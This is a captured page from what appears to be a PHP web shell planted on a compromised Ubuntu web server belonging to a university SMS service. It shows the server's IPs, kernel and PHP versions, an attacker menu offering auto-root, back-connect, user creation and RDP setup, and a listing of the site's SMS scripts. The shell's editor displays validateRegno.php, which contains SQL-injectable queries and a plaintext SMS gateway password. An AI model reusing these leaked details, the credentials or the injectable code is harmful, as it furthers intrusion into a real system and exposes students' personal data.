Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.218.250.241
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms /
[ HOME SHELL ]
Name
Size
Permission
Action
google-api-php-client
[ DIR ]
drwxr-xr-x
kreait_firebase
[ DIR ]
drwxrwxr-x
admission_sms_push.php
2.3
KB
-rwxr-xr-x
admission_sms_push_bnu.php
2.29
KB
-rwxr-xr-x
admsumsendsms.php
6.12
KB
-rwxr-xr-x
admsumsendsms_bnu_17102018.php
8.06
KB
-rwxr-xr-x
admsumsendsms_bnu_29102018.php
12.17
KB
-rwxr-xr-x
admsumsendsms_bnu_adm_pg.php
18.03
KB
-rwxr-xr-x
admsumsendsms_bnu_wait.php
27.52
KB
-rwxr-xr-x
attDegwiseReport.php
9
KB
-rw-r--r--
cron_send_sms_interana.php
1.18
KB
-rwxr-xr-x
cronjob_sendmail.php
5.81
KB
-rwxr-xr-x
cronjob_sendsms.php
5.35
KB
-rwxr-xr-x
cronjob_sendsms_bcu_mo.php
3.18
KB
-rwxr-xr-x
cronjob_sendsms_bnu.php
3.84
KB
-rwxr-xr-x
cronjob_sendsms_bnu_old.php
2.55
KB
-rwxr-xr-x
cronjob_sendsms_dud.php
2.84
KB
-rwxr-xr-x
cronjob_sendsms_dud_mo.php
3.16
KB
-rwxr-xr-x
cronjob_sendsms_old_smssum.php
3.61
KB
-rwxr-xr-x
google-api-php-client-v2.7.1-P...
13.11
MB
-rwxr-xr-x
import_data.php
3.21
KB
-rwxr-xr-x
mail.php
459
B
-rwxr-xr-x
sendGridMail.php
1.29
KB
-rwxr-xr-x
sendnotifapi.php
5.18
KB
-rwxr-xr-x
sendsmsapi.php
759
B
-rwxr-xr-x
sendsmsapi_adm.php
6.61
KB
-rw-rw-r--
sendsmsapi_new.php
6.06
KB
-rw-r--r--
sendsmsapi_onex.php
6.84
KB
-rw-r--r--
sendsmsapi_onex_new.php
4.59
KB
-rw-r--r--
sendsmsapiv1.php
9.48
KB
-rwxr-xr-x
sendsmsapiv1_07082024.php
9.47
KB
-rwxr-xr-x
sms.php
422
B
-rwxr-xr-x
sms_statistics.php
2.99
KB
-rwxr-xr-x
sms_test.php
1.21
KB
-rw-r--r--
stud_data_push.php
1.43
KB
-rwxr-xr-x
teach_data_push.php
1.47
KB
-rwxr-xr-x
test.txt
1.44
KB
-rwxr-xr-x
test_firebase_service.php
237
B
-rwxr-xr-x
validateRegno.php
2.4
KB
-rwxr-xr-x
vskub_pget_smsstat.php
2.45
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : validateRegno.php
<?php include ("database.php"); include("var/www/html/sms/sendsmsapiv1.php"); error_reporting(E_ALL); ini_set('display_errors', 'on'); $mobile = trim($_POST['mobile']); $query1 = "select FFOLDER from control"; $result1 = mysqli_query($conn,$query1); $row1 = $result1->fetch_assoc(); $FFOLDER = $row1['FFOLDER']; $query = "SELECT fname, ifnull(femail,'') as femail from collstud where fmobileno = '{$mobile}' and factive = 'T'"; $result = mysqli_query($conn,$query); $count = mysqli_num_rows($result); if($count == 0) { $query = "SELECT fname, ifnull(femail,'') as femail, fdegree, fcollcode from collstud where fmobileno = '{$mobile}'"; $result = mysqli_query($conn,$query); $count = mysqli_num_rows($result); if($count > 0) { $studdetl = mysqli_fetch_assoc($result); $degquery = "select * from degree where fdegree = '{$studdetl['fdegree']}'"; $result = mysqli_query($conn,$degquery); $count = mysqli_num_rows($result); if($count == 0) { $row["status"] = 'invalid'; $row["msg"] = "Error in degree define ({$studdetl['fdegree']}), Contact Help Desk."; echo json_encode($row); die(); } $row['result'] = $studdetl; $row['status'] = 'success'; date_default_timezone_set('Asia/Kolkata'); $time = date("h:i A"); $motpaswrd = rand(1000, 9000); //strtoupper(substr(sha1(rand()), 0, 4)); //$smsotp = "Dear Student, Your mobile OTP for Registration is {$motpaswrd} sent at {$time}"; $smsotp = "From $FFOLDER: Dear Student, OTP for Registration is $motpaswrd. sent at {$time} - Uniclare"; // $username = 'logisyhttp'; // $password = 'logisy@928'; // $from = 'UNISOL'; // $to = $mobile; // $text = $smsotp; // $category = ''; // $smsresp = sendsmaapi($username,$password,$from,$to,$text,$category); //var_dump($smsresp); $sms = new SMS("042", 'OTP'); $sms->sendIndvidualSms($mobile, $smsotp, '900', 'ADM'); $row["sms"] = "Sent."; //var_dump($row); $query = "update collstud set fmobileotp = '{$motpaswrd}', fmobotptime = now(), fotpcounter = fotpcounter+1 where fmobileno = '{$mobile}'"; $result = mysqli_query($conn,$query); //var_dump($result); echo json_encode($row); } else { $row["status"] = 'invalid'; $row["msg"] = "This Mobile No. is not submitted by college to university. Contact college"; echo json_encode($row); } } else { $row["status"] = 'invalid'; $row["msg"] = 'You have already registered, Please Login'; echo json_encode($row); } ?>
Close